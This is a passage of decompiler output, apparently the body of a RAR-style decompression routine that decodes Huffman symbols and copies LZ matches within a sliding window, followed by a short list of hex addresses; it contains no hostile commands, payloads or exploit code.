				signed int _t469;
				signed short _t470;
				unsigned int _t475;
				signed int _t480;
				unsigned int _t482;
				signed int _t496;
				signed int _t499;
				signed int _t501;
				signed int _t504;
				signed int _t506;
				signed int _t508;
				signed int _t510;
				intOrPtr* _t512;
				intOrPtr* _t513;
				signed int _t514;
				intOrPtr* _t515;
				signed int _t516;
				signed int _t522;
				signed int _t524;
				signed int* _t525;
				intOrPtr _t526;
				void* _t529;
				signed int _t532;
				signed int* _t535;
				unsigned int _t538;
				signed int _t539;
				void* _t540;
				signed int _t543;
				signed int _t545;
				signed int _t548;
				signed int _t551;
				signed int _t554;
				void* _t556;
				signed int _t559;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t565;
				signed int _t568;
				unsigned int _t575;
				signed int _t576;
				void* _t577;
				signed int _t580;
				void* _t583;
				signed int _t586;
				signed int _t589;
				signed int _t591;
				void* _t593;
				signed int _t596;
				intOrPtr* _t598;
				void* _t599;
				signed int _t602;
				void* _t605;
				signed int _t609;
				signed int _t610;
				intOrPtr* _t612;
				void* _t613;
				void* _t616;
				signed int _t619;
				intOrPtr* _t625;
				void* _t626;
				unsigned int _t633;
				signed int _t636;
				signed int _t637;
				unsigned int _t639;
				signed int _t642;
				void* _t645;
				signed int _t646;
				void* _t649;
				signed int _t650;
				signed int _t651;
				void* _t654;
				unsigned int _t656;
				unsigned int _t660;
				signed int _t663;
				signed int _t665;
				unsigned int _t666;
				signed int _t668;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				signed short _t672;
				signed int _t673;
				signed int _t674;
				unsigned int _t678;
				signed int _t680;
				intOrPtr _t684;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int* _t689;
				char* _t692;
				char* _t693;
				signed int _t696;
				void* _t697;
				void* _t700;

				L0:
				while(1) {
					L0:
					_t684 = __esi;
					_t525 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t525 =  *_t525 &  *(_t684 + 0xe6dc);
						if( *_t689 <  *((intOrPtr*)(_t684 + 0x88))) {
							goto L11;
						} else {
							_t513 = _t684 + 0x8c;
							goto L3;
						}
						while(1) {
							L3:
							_t700 =  *_t689 -  *((intOrPtr*)(_t684 + 0x94)) - 1 +  *_t513;
							if(_t700 <= 0 && (_t700 != 0 ||  *((intOrPtr*)(_t684 + 8)) <  *((intOrPtr*)(_t684 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t684 + 0x9c)) != 0) {
								L97:
								_t360 = E00A45202(_t684);
								L98:
								return _t360;
							}
							L7:
							_push(_t513);
							_push(_t689);
							_t360 = E00A43E0B(_t684);
							if(_t360 == 0) {
								goto L98;
							}
							L8:
							_push(_t684 + 0xa0);
							_push(_t513);
							_push(_t689);
							_t360 = E00A443BF(_t684);
							if(_t360 != 0) {
								continue;
							} else {
								goto L98;
							}
						}
						L10:
						_t496 = E00A44E52(_t684);
						__eflags = _t496;
						if(_t496 == 0) {
							goto L97;
						}
						L11:
						_t526 =  *((intOrPtr*)(_t684 + 0x4b3c));
						__eflags = (_t526 -  *(_t684 + 0x7c) &  *(_t684 + 0xe6dc)) - 0x1004;
						if((_t526 -  *(_t684 + 0x7c) &  *(_t684 + 0xe6dc)) >= 0x1004) {
							L17:
							_t344 = E00A3A89D(_t689);
							_t345 =  *(_t684 + 0x124);
							_t633 = _t344 & 0x0000fffe;
							__eflags = _t633 -  *((intOrPtr*)(_t684 + 0xa4 + _t345 * 4));
							if(_t633 >=  *((intOrPtr*)(_t684 + 0xa4 + _t345 * 4))) {
								L19:
								_t671 = 0xf;
								_t346 = _t345 + 1;
								__eflags = _t346 - _t671;
								if(_t346 >= _t671) {
									L25:
									_t499 = _t689[1] + _t671;
									_t348 = _t499 >> 3;
									 *_t689 =  *_t689 + _t348;
									 *(_t697 + 0x10) =  *_t689;
									_t689[1] = _t499 & 0x00000007;
									_t529 = 0x10;
									_t532 =  *((intOrPtr*)(_t684 + 0xe4 + _t671 * 4)) + (_t633 -  *((intOrPtr*)(_t684 + 0xa0 + _t671 * 4)) >> _t529 - _t671);
									__eflags = _t532 -  *((intOrPtr*)(_t684 + 0xa0));
									asm("sbb eax, eax");
									_t349 = _t348 & _t532;
									__eflags = _t349;
									_t672 =  *(_t684 + 0xd28 + _t349 * 2) & 0x0000ffff;
									_t350 =  *(_t697 + 0x10);
									goto L26;
								} else {
									_t625 = _t684 + (_t346 + 0x29) * 4;
									while(1) {
										L21:
										__eflags = _t633 -  *_t625;
										if(_t633 <  *_t625) {
											_t671 = _t346;
											goto L25;
										}
										L22:
										_t346 = _t346 + 1;
										_t625 = _t625 + 4;
										__eflags = _t346 - 0xf;
										if(_t346 < 0xf) {
											continue;
										} else {
											goto L25;
										}
									}
									goto L25;
								}
							} else {
								_t626 = 0x10;
								_t670 = _t633 >> _t626 - _t345;
								_t508 = ( *(_t670 + _t684 + 0x128) & 0x000000ff) + _t689[1];
								 *_t689 =  *_t689 + (_t508 >> 3);
								_t504 = _t508 & 0x00000007;
								_t350 =  *_t689;
								_t689[1] = _t504;
								_t672 =  *(_t684 + 0x528 + _t670 * 2) & 0x0000ffff;
								 *(_t697 + 0x10) = _t350;
								L26:
								_t636 = _t672 & 0x0000ffff;
								__eflags = _t636 - 0x100;
								if(_t636 >= 0x100) {
									L30:
									__eflags = _t636 - 0x106;
									if(_t636 < 0x106) {
										L94:
										__eflags = _t636 - 0x100;
										if(_t636 != 0x100) {
											L100:
											__eflags = _t636 - 0x101;
											if(_t636 != 0x101) {
												L125:
												_t637 = _t636 + 0xfffffefe;
												__eflags = _t637;
												_t535 = _t684 + (_t637 + 0x18) * 4;
												_t501 =  *_t535;
												 *(_t697 + 0x18) = _t501;
												if(_t637 == 0) {
													L127:
													 *(_t684 + 0x60) = _t501;
													_t351 = E00A3A89D(_t689);
													_t352 =  *(_t684 + 0x2de8);
													_t639 = _t351 & 0x0000fffe;
													__eflags = _t639 -  *((intOrPtr*)(_t684 + 0x2d68 + _t352 * 4));
													if(_t639 >=  *((intOrPtr*)(_t684 + 0x2d68 + _t352 * 4))) {
														L129:
														_t673 = 0xf;
														_t353 = _t352 + 1;
														__eflags = _t353 - _t673;
														if(_t353 >= _t673) {
															L135:
															_t538 = _t689[1] + _t673;
															_t539 = _t538 & 0x00000007;
															_t689[1] = _t539;
															_t355 = _t538 >> 3;
															 *_t689 =  *_t689 + _t355;
															 *(_t697 + 0x20) = _t539;
															_t540 = 0x10;
															_t543 =  *((intOrPtr*)(_t684 + 0x2da8 + _t673 * 4)) + (_t639 -  *((intOrPtr*)(_t684 + 0x2d64 + _t673 * 4)) >> _t540 - _t673);
															__eflags = _t543 -  *((intOrPtr*)(_t684 + 0x2d64));
															asm("sbb eax, eax");
															_t356 = _t355 & _t543;
															__eflags = _t356;
															_t357 =  *(_t684 + 0x39ec + _t356 * 2) & 0x0000ffff;
															L136:
															_t674 = _t357 & 0x0000ffff;
															__eflags = _t674 - 8;
															if(_t674 >= 8) {
																_t504 = (_t674 >> 2) - 1;
																_t678 = ((_t674 & 0x00000003 | 0x00000004) << _t504) + 2;
																__eflags = _t504;
																if(_t504 != 0) {
																	_t409 = E00A3A89D(_t689);
																	_t556 = 0x10;
																	_t678 = _t678 + (_t409 >> _t556 - _t504);
																	_t559 =  *(_t697 + 0x20) + _t504;
																	 *_t689 =  *_t689 + (_t559 >> 3);
																	_t560 = _t559 & 0x00000007;
																	__eflags = _t560;
																	_t689[1] = _t560;
																}
															} else {
																_t678 = _t674 + 2;
															}
															__eflags =  *((char*)(_t684 + 0x4c44));
															_t545 =  *(_t697 + 0x18);
															 *(_t684 + 0x74) = _t678;
															if( *((char*)(_t684 + 0x4c44)) == 0) {
																L142:
																_t642 =  *(_t684 + 0x7c);
																_t506 = _t642 - _t545;
																_t359 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t506 - _t359;
																if(_t506 >= _t359) {
																	goto L152;
																}
																L143:
																__eflags = _t642 - _t359;
																if(_t642 >= _t359) {
																	goto L152;
																}
																L144:
																_t363 =  *((intOrPtr*)(_t684 + 0x4b40));
																_t512 = _t506 + _t363;
																_t692 = _t642 + _t363;
																_t645 = 8;
																 *(_t684 + 0x7c) = _t642 + _t678;
																__eflags = _t678 - _t645;
																if(_t678 < _t645) {
																	L114:
																	_t525 = _t684 + 0x7c;
																	__eflags = _t678;
																	if(_t678 == 0) {
																		L89:
																		_t689 = _t684 + 4;
																		continue;
																	}
																	L115:
																	_t525 = _t684 + 0x7c;
																	 *_t692 =  *_t512;
																	__eflags = _t678 - 1;
																	if(_t678 <= 1) {
																		goto L89;
																	}
																	L116:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
																	__eflags = _t678 - 2;
																	if(_t678 <= 2) {
																		goto L89;
																	}
																	L117:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
																	__eflags = _t678 - 3;
																	if(_t678 <= 3) {
																		goto L89;
																	}
																	L118:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
																	__eflags = _t678 - 4;
																	if(_t678 <= 4) {
																		goto L89;
																	}
																	L119:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
																	__eflags = _t678 - 5;
																	if(_t678 <= 5) {
																		goto L89;
																	}
																	L120:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
																	__eflags = _t678 - 6;
																	if(_t678 <= 6) {
																		goto L89;
																	}
																	L121:
																	_t360 =  *((intOrPtr*)(_t512 + 6));
																	 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
																	goto L155;
																}
																L145:
																__eflags = _t545 - _t678;
																if(_t545 >= _t678) {
																	L149:
																	_t372 = _t678 >> 3;
																	__eflags = _t372;
																	 *(_t697 + 0x20) = _t372;
																	_t686 = _t372;
																	do {
																		L150:
																		E00A50320(_t692, _t512, _t645);
																		_t697 = _t697 + 0xc;
																		_t645 = 8;
																		_t512 = _t512 + _t645;
																		_t692 = _t692 + _t645;
																		_t678 = _t678 - _t645;
																		_t686 = _t686 - 1;
																		__eflags = _t686;
																	} while (_t686 != 0);
																	L113:
																	_t684 =  *((intOrPtr*)(_t697 + 0x1c));
																	goto L114;
																}
																L146:
																_t548 = _t678 >> 3;
																__eflags = _t548;
																do {
																	L147:
																	_t678 = _t678 - _t645;
																	 *_t692 =  *_t512;
																	 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
																	 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
																	 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
																	 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
																	 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
																	 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
																	_t381 =  *((intOrPtr*)(_t512 + 7));
																	_t512 = _t512 + _t645;
																	 *((char*)(_t692 + 7)) = _t381;
																	_t692 = _t692 + _t645;
																	_t548 = _t548 - 1;
																	__eflags = _t548;
																} while (_t548 != 0);
																goto L114;
															} else {
																L141:
																_push( *(_t684 + 0xe6dc));
																_push(_t684 + 0x7c);
																_push(_t545);
																L70:
																_push(_t678);
																E00A42C30();
																while(1) {
																	L0:
																	_t684 = __esi;
																	_t525 = __esi + 0x7c;
																	do {
																		do {
																			goto L3;
																			L152:
																			_t525 = _t684 + 0x7c;
																			__eflags = _t678;
																		} while (_t678 == 0);
																		_t360 =  *(_t684 + 0xe6dc);
																		do {
																			L154:
																			_t361 = _t360 & _t506;
																			_t506 = _t506 + 1;
																			 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t642)) =  *((intOrPtr*)(_t361 +  *((intOrPtr*)(_t684 + 0x4b40))));
																			_t360 =  *(_t684 + 0xe6dc);
																			_t642 =  *(_t684 + 0x7c) + 0x00000001 & _t360;
																			 *(_t684 + 0x7c) = _t642;
																			_t678 = _t678 - 1;
																			__eflags = _t678;
																		} while (_t678 != 0);
																		L155:
																		goto L0;
																		do {
																			while(1) {
																				L0:
																				_t684 = __esi;
																				_t525 = __esi + 0x7c;
																				L1:
																				 *_t525 =  *_t525 &  *(_t684 + 0xe6dc);
																				if( *_t689 <  *((intOrPtr*)(_t684 + 0x88))) {
																					goto L11;
																				} else {
																					_t513 = _t684 + 0x8c;
																					goto L3;
																				}
																			}
																			L96:
																			_t438 = E00A4253E(_t684, _t697 + 0x28);
																			__eflags = _t438;
																		} while (_t438 != 0);
																		goto L97;
																		L90:
																		_t525 = _t684 + 0x7c;
																		__eflags = _t678;
																	} while (_t678 == 0);
																	_t386 =  *(_t684 + 0xe6dc);
																	_t514 =  *(_t697 + 0x20);
																	do {
																		L92:
																		_t387 = _t386 & _t514;
																		_t514 = _t514 + 1;
																		 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t646)) =  *((intOrPtr*)(_t387 +  *((intOrPtr*)(_t684 + 0x4b40))));
																		_t386 =  *(_t684 + 0xe6dc);
																		_t646 =  *(_t684 + 0x7c) + 0x00000001 & _t386;
																		 *(_t684 + 0x7c) = _t646;
																		_t678 = _t678 - 1;
																		__eflags = _t678;
																	} while (_t678 != 0);
																	goto L155;
																}
															}
														}
														L130:
														_t562 = _t684 + (_t353 + 0xb5a) * 4;
														while(1) {
															L131:
															__eflags = _t639 -  *_t562;
															if(_t639 <  *_t562) {
																break;
															}
															L132:
															_t353 = _t353 + 1;
															_t562 = _t562 + 4;
															__eflags = _t353 - 0xf;
															if(_t353 < 0xf) {
																continue;
															}
															L133:
															goto L135;
														}
														L134:
														_t673 = _t353;
														goto L135;
													}
													L128:
													_t563 = 0x10;
													_t650 = _t639 >> _t563 - _t352;
													_t524 = ( *(_t650 + _t684 + 0x2dec) & 0x000000ff) + _t689[1];
													 *_t689 =  *_t689 + (_t524 >> 3);
													_t504 = _t524 & 0x00000007;
													_t689[1] = _t504;
													_t357 =  *(_t684 + 0x31ec + _t650 * 2) & 0x0000ffff;
													 *(_t697 + 0x20) = _t504;
													goto L136;
												} else {
													goto L126;
												}
												do {
													L126:
													 *_t535 =  *(_t535 - 4);
													_t535 = _t535 - 4;
													_t637 = _t637 - 1;
													__eflags = _t637;
												} while (_t637 != 0);
												goto L127;
											}
											L101:
											_t678 =  *(_t684 + 0x74);
											__eflags = _t678;
											if(_t678 == 0) {
												while(1) {
													L0:
													_t684 = __esi;
													_t525 = __esi + 0x7c;
													goto L1;
												}
											}
											L102:
											__eflags =  *((char*)(_t684 + 0x4c44));
											if( *((char*)(_t684 + 0x4c44)) == 0) {
												L104:
												_t651 =  *(_t684 + 0x7c);
												_t565 =  *(_t684 + 0x60);
												_t417 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
												_t510 = _t651 - _t565;
												__eflags = _t510 - _t417;
												if(_t510 >= _t417) {
													L122:
													_t418 =  *(_t684 + 0xe6dc);
													do {
														L123:
														_t419 = _t418 & _t510;
														_t510 = _t510 + 1;
														 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t651)) =  *((intOrPtr*)(_t419 +  *((intOrPtr*)(_t684 + 0x4b40))));
														_t418 =  *(_t684 + 0xe6dc);
														_t651 =  *(_t684 + 0x7c) + 0x00000001 & _t418;
														 *(_t684 + 0x7c) = _t651;
														_t678 = _t678 - 1;
														__eflags = _t678;
													} while (_t678 != 0);
													goto L155;
												}
												L105:
												__eflags = _t651 - _t417;
												if(_t651 >= _t417) {
													goto L122;
												}
												L106:
												_t421 =  *((intOrPtr*)(_t684 + 0x4b40));
												_t512 = _t510 + _t421;
												_t692 = _t651 + _t421;
												_t654 = 8;
												 *(_t684 + 0x7c) = _t651 + _t678;
												__eflags = _t678 - _t654;
												if(_t678 < _t654) {
													goto L114;
												}
												L107:
												__eflags = _t565 - _t678;
												if(_t565 >= _t678) {
													L111:
													_t424 = _t678 >> 3;
													__eflags = _t424;
													 *(_t697 + 0x20) = _t424;
													_t688 = _t424;
													do {
														L112:
														E00A50320(_t692, _t512, _t654);
														_t697 = _t697 + 0xc;
														_t654 = 8;
														_t512 = _t512 + _t654;
														_t692 = _t692 + _t654;
														_t678 = _t678 - _t654;
														_t688 = _t688 - 1;
														__eflags = _t688;
													} while (_t688 != 0);
													goto L113;
												}
												L108:
												_t568 = _t678 >> 3;
												__eflags = _t568;
												do {
													L109:
													_t678 = _t678 - _t654;
													 *_t692 =  *_t512;
													 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
													 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
													 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
													 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
													 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
													 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
													_t433 =  *((intOrPtr*)(_t512 + 7));
													_t512 = _t512 + _t654;
													 *((char*)(_t692 + 7)) = _t433;
													_t692 = _t692 + _t654;
													_t568 = _t568 - 1;
													__eflags = _t568;
												} while (_t568 != 0);
												goto L114;
											}
											L103:
											_push( *(_t684 + 0xe6dc));
											_push(_t684 + 0x7c);
											_push( *(_t684 + 0x60));
											goto L70;
										}
										L95:
										_push(_t697 + 0x28);
										_t436 = E00A43F9D(_t684, _t689);
										__eflags = _t436;
										if(_t436 == 0) {
											goto L97;
										}
										goto L96;
									}
									L31:
									_t680 = _t636 - 0x106;
									__eflags = _t680 - 8;
									if(_t680 >= 8) {
										_t441 = (_t680 >> 2) - 1;
										 *(_t697 + 0x20) = _t441;
										_t678 = ((_t680 & 0x00000003 | 0x00000004) << _t441) + 2;
										__eflags = _t441;
										if(_t441 != 0) {
											_t482 = E00A3A89D(_t689);
											_t522 = _t504 +  *(_t697 + 0x20);
											_t616 = 0x10;
											_t678 = _t678 + (_t482 >> _t616 -  *(_t697 + 0x20));
											_t619 =  *(_t697 + 0x10) + (_t522 >> 3);
											_t504 = _t522 & 0x00000007;
											__eflags = _t504;
											 *(_t697 + 0x10) = _t619;
											 *_t689 = _t619;
											_t689[1] = _t504;
										}
									} else {
										 *(_t697 + 0x10) = _t350;
										_t678 = _t680 + 2;
									}
									_t442 = E00A3A89D(_t689);
									_t443 =  *(_t684 + 0x1010);
									_t656 = _t442 & 0x0000fffe;
									__eflags = _t656 -  *((intOrPtr*)(_t684 + 0xf90 + _t443 * 4));
									if(_t656 >=  *((intOrPtr*)(_t684 + 0xf90 + _t443 * 4))) {
										L37:
										_t516 = 0xf;
										_t444 = _t443 + 1;
										__eflags = _t444 - _t516;
										if(_t444 >= _t516) {
											L43:
											_t575 = _t689[1] + _t516;
											_t576 = _t575 & 0x00000007;
											_t689[1] = _t576;
											 *_t689 =  *_t689 + (_t575 >> 3);
											_t447 =  *_t689;
											 *(_t697 + 0x10) = _t576;
											_t577 = 0x10;
											 *(_t697 + 0x14) = _t447;
											_t580 =  *((intOrPtr*)(_t684 + 0xfd0 + _t516 * 4)) + (_t656 -  *((intOrPtr*)(_t684 + 0xf8c + _t516 * 4)) >> _t577 - _t516);
											__eflags = _t580 -  *((intOrPtr*)(_t684 + 0xf8c));
											asm("sbb eax, eax");
											_t448 = _t447 & _t580;
											__eflags = _t448;
											_t449 =  *(_t684 + 0x1c14 + _t448 * 2) & 0x0000ffff;
											goto L44;
										}
										L38:
										_t612 = _t684 + (_t444 + 0x3e4) * 4;
										while(1) {
											L39:
											__eflags = _t656 -  *_t612;
											if(_t656 <  *_t612) {
												break;
											}
											L40:
											_t444 = _t444 + 1;
											_t612 = _t612 + 4;
											__eflags = _t444 - 0xf;
											if(_t444 < 0xf) {
												continue;
											}
											L41:
											goto L43;
										}
										L42:
										_t516 = _t444;
										goto L43;
									} else {
										L36:
										_t613 = 0x10;
										_t666 = _t656 >> _t613 - _t443;
										 *(_t697 + 0x20) = _t666;
										_t668 = ( *(_t666 + _t684 + 0x1014) & 0x000000ff) + _t504;
										_t480 = (_t668 >> 3) +  *(_t697 + 0x10);
										_t669 = _t668 & 0x00000007;
										 *(_t697 + 0x14) = _t480;
										 *_t689 = _t480;
										_t689[1] = _t669;
										 *(_t697 + 0x10) = _t669;
										_t449 =  *(_t684 + 0x1414 +  *(_t697 + 0x20) * 2) & 0x0000ffff;
										L44:
										_t450 = _t449 & 0x0000ffff;
										__eflags = _t450 - 4;
										if(_t450 >= 4) {
											L46:
											_t696 = (_t450 >> 1) - 1;
											_t454 = ((_t450 & 0x00000001 | 0x00000002) << _t696) + 1;
											 *(_t697 + 0x20) = _t454;
											_t504 = _t454;
											 *(_t697 + 0x18) = _t504;
											__eflags = _t696;
											if(_t696 == 0) {
												L63:
												_t689 = _t684 + 4;
												L64:
												__eflags = _t504 - 0x100;
												if(_t504 > 0x100) {
													_t678 = _t678 + 1;
													__eflags = _t504 - 0x2000;
													if(_t504 > 0x2000) {
														_t678 = _t678 + 1;
														__eflags = _t504 - 0x40000;
														if(_t504 > 0x40000) {
															_t678 = _t678 + 1;
															__eflags = _t678;
														}
													}
												}
												 *(_t684 + 0x6c) =  *(_t684 + 0x68);
												 *(_t684 + 0x68) =  *(_t684 + 0x64);
												 *(_t684 + 0x64) =  *(_t684 + 0x60);
												 *(_t684 + 0x60) = _t504;
												__eflags =  *((char*)(_t684 + 0x4c44));
												 *(_t684 + 0x74) = _t678;
												if( *((char*)(_t684 + 0x4c44)) == 0) {
													L71:
													_t646 =  *(_t684 + 0x7c);
													_t551 = _t646 - _t504;
													_t385 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
													 *(_t697 + 0x20) = _t551;
													__eflags = _t551 - _t385;
													if(_t551 >= _t385) {
														goto L90;
													}
													L72:
													__eflags = _t646 - _t385;
													if(_t646 >= _t385) {
														goto L90;
													}
													L73:
													_t389 =  *((intOrPtr*)(_t684 + 0x4b40));
													_t515 = _t389 + _t551;
													_t693 = _t646 + _t389;
													_t649 = 8;
													_t525 = _t684 + 0x7c;
													 *_t525 = _t646 + _t678;
													__eflags = _t678 - _t649;
													if(_t678 < _t649) {
														L81:
														__eflags = _t678;
														if(_t678 != 0) {
															 *_t693 =  *_t515;
															__eflags = _t678 - 1;
															if(_t678 > 1) {
																 *((char*)(_t693 + 1)) =  *((intOrPtr*)(_t515 + 1));
																__eflags = _t678 - 2;
																if(_t678 > 2) {
																	 *((char*)(_t693 + 2)) =  *((intOrPtr*)(_t515 + 2));
																	__eflags = _t678 - 3;
																	if(_t678 > 3) {
																		 *((char*)(_t693 + 3)) =  *((intOrPtr*)(_t515 + 3));
																		__eflags = _t678 - 4;
																		if(_t678 > 4) {
																			 *((char*)(_t693 + 4)) =  *((intOrPtr*)(_t515 + 4));
																			__eflags = _t678 - 5;
																			if(_t678 > 5) {
																				 *((char*)(_t693 + 5)) =  *((intOrPtr*)(_t515 + 5));
																				__eflags = _t678 - 6;
																				if(_t678 > 6) {
																					 *((char*)(_t693 + 6)) =  *((intOrPtr*)(_t515 + 6));
																				}
																			}
																		}
																	}
																}
															}
														}
														goto L89;
													}
													L74:
													__eflags =  *(_t697 + 0x18) - _t678;
													if( *(_t697 + 0x18) >= _t678) {
														L78:
														_t399 = _t678 >> 3;
														__eflags = _t399;
														 *(_t697 + 0x20) = _t399;
														_t687 = _t399;
														do {
															L79:
															E00A50320(_t693, _t515, _t649);
															_t697 = _t697 + 0xc;
															_t649 = 8;
															_t515 = _t515 + _t649;
															_t693 = _t693 + _t649;
															_t678 = _t678 - _t649;
															_t687 = _t687 - 1;
															__eflags = _t687;
														} while (_t687 != 0);
														_t684 =  *((intOrPtr*)(_t697 + 0x1c));
														_t525 =  *(_t697 + 0x24);
														goto L81;
													}
													L75:
													_t554 = _t678 >> 3;
													__eflags = _t554;
													do {
														L76:
														_t678 = _t678 - _t649;
														 *_t693 =  *_t515;
														 *((char*)(_t693 + 1)) =  *((intOrPtr*)(_t515 + 1));
														 *((char*)(_t693 + 2)) =  *((intOrPtr*)(_t515 + 2));
														 *((char*)(_t693 + 3)) =  *((intOrPtr*)(_t515 + 3));
														 *((char*)(_t693 + 4)) =  *((intOrPtr*)(_t515 + 4));
														 *((char*)(_t693 + 5)) =  *((intOrPtr*)(_t515 + 5));
														 *((char*)(_t693 + 6)) =  *((intOrPtr*)(_t515 + 6));
														_t408 =  *((intOrPtr*)(_t515 + 7));
														_t515 = _t515 + _t649;
														 *((char*)(_t693 + 7)) = _t408;
														_t693 = _t693 + _t649;
														_t554 = _t554 - 1;
														__eflags = _t554;
													} while (_t554 != 0);
													_t525 = _t684 + 0x7c;
													goto L81;
												} else {
													L69:
													_push( *(_t684 + 0xe6dc));
													_push(_t684 + 0x7c);
													_push(_t504);
													goto L70;
												}
											}
											L47:
											__eflags = _t696 - 4;
											if(__eflags < 0) {
												L62:
												_t459 = E00A48934(_t684 + 4);
												_t583 = 0x20;
												_t504 = (_t459 >> _t583 - _t696) +  *(_t697 + 0x20);
												_t586 =  *(_t697 + 0x10) + _t696;
												 *(_t697 + 0x18) = _t504;
												_t689 = _t684 + 4;
												 *_t689 = (_t586 >> 3) +  *(_t697 + 0x14);
												_t689[1] = _t586 & 0x00000007;
												goto L64;
											}
											L48:
											if(__eflags <= 0) {
												_t689 = _t684 + 4;
											} else {
												_t475 = E00A48934(_t684 + 4);
												_t605 = 0x24;
												_t504 = (_t475 >> _t605 - _t696 << 4) +  *(_t697 + 0x20);
												_t609 =  *(_t697 + 0x10) + 0xfffffffc + _t696;
												_t689 = _t684 + 4;
												_t665 =  *(_t697 + 0x14) + (_t609 >> 3);
												_t610 = _t609 & 0x00000007;
												 *(_t697 + 0x14) = _t665;
												 *_t689 = _t665;
												 *(_t697 + 0x10) = _t610;
												_t689[1] = _t610;
											}
											_t463 = E00A3A89D(_t689);
											_t464 =  *(_t684 + 0x1efc);
											_t660 = _t463 & 0x0000fffe;
											__eflags = _t660 -  *((intOrPtr*)(_t684 + 0x1e7c + _t464 * 4));
											if(_t660 >=  *((intOrPtr*)(_t684 + 0x1e7c + _t464 * 4))) {
												L53:
												_t589 = 0xf;
												_t465 = _t464 + 1;
												 *(_t697 + 0x18) = _t589;
												__eflags = _t465 - _t589;
												if(_t465 >= _t589) {
													L59:
													_t591 = _t689[1] +  *(_t697 + 0x18);
													 *_t689 =  *_t689 + (_t591 >> 3);
													_t468 =  *(_t697 + 0x18);
													_t689[1] = _t591 & 0x00000007;
													_t593 = 0x10;
													_t596 =  *((intOrPtr*)(_t684 + 0x1ebc + _t468 * 4)) + (_t660 -  *((intOrPtr*)(_t684 + 0x1e78 + _t468 * 4)) >> _t593 - _t468);
													__eflags = _t596 -  *((intOrPtr*)(_t684 + 0x1e78));
													asm("sbb eax, eax");
													_t469 = _t468 & _t596;
													__eflags = _t469;
													_t470 =  *(_t684 + 0x2b00 + _t469 * 2) & 0x0000ffff;
													goto L60;
												}
												L54:
												_t598 = _t684 + (_t465 + 0x79f) * 4;
												while(1) {
													L55:
													__eflags = _t660 -  *_t598;
													if(_t660 <  *_t598) {
														break;
													}
													L56:
													_t465 = _t465 + 1;
													_t598 = _t598 + 4;
													__eflags = _t465 - 0xf;
													if(_t465 < 0xf) {
														continue;
													}
													L57:
													goto L59;
												}
												L58:
												 *(_t697 + 0x18) = _t465;
												goto L59;
											} else {
												L52:
												_t599 = 0x10;
												_t663 = _t660 >> _t599 - _t464;
												_t602 = ( *(_t663 + _t684 + 0x1f00) & 0x000000ff) +  *(_t697 + 0x10);
												 *_t689 = (_t602 >> 3) +  *(_t697 + 0x14);
												_t689[1] = _t602 & 0x00000007;
												_t470 =  *(_t684 + 0x2300 + _t663 * 2) & 0x0000ffff;
												L60:
												_t504 = _t504 + (_t470 & 0x0000ffff);
												__eflags = _t504;
												L61:
												 *(_t697 + 0x18) = _t504;
												goto L64;
											}
										}
										L45:
										_t504 = _t450 + 1;
										goto L61;
									}
								}
								L27:
								__eflags =  *((char*)(_t684 + 0x4c44));
								if( *((char*)(_t684 + 0x4c44)) == 0) {
									 *( *((intOrPtr*)(_t684 + 0x4b40)) +  *(_t684 + 0x7c)) = _t636;
									_t525 = _t684 + 0x7c;
									 *_t525 =  *_t525 + 1;
									continue;
								} else {
									 *(_t684 + 0x7c) =  *(_t684 + 0x7c) + 1;
									 *((char*)(E00A42391(_t684 + 0x4b44,  *(_t684 + 0x7c)))) = _t672 & 0x0000ffff;
									goto L0;
								}
							}
						}
						L12:
						__eflags = _t526 -  *(_t684 + 0x7c);
						if(_t526 ==  *(_t684 + 0x7c)) {
							goto L17;
						}
						L13:
						E00A45202(_t684);
						_t360 =  *(_t684 + 0x4c5c);
						__eflags = _t360 -  *((intOrPtr*)(_t684 + 0x4c4c));
						if(__eflags > 0) {
							goto L98;
						}
						L14:
						if(__eflags < 0) {
							L16:
							__eflags =  *((char*)(_t684 + 0x4c50));
							if( *((char*)(_t684 + 0x4c50)) != 0) {
								L156:
								 *((char*)(_t684 + 0x4c60)) = 0;
								goto L98;
							}
							goto L17;
						}
						L15:
						_t360 =  *(_t684 + 0x4c58);
						__eflags = _t360 -  *((intOrPtr*)(_t684 + 0x4c48));
						if(_t360 >  *((intOrPtr*)(_t684 + 0x4c48))) {
							goto L98;
						}
						goto L16;
					}
				}
			}

0x00a462ca
0x00a462ca
0x00a462ca
0x00a462ca
0x00a462ca
0x00a462cd
0x00a462cd
0x00a462d3
0x00a462de
0x00000000
0x00a462e0
0x00a462e0
0x00000000
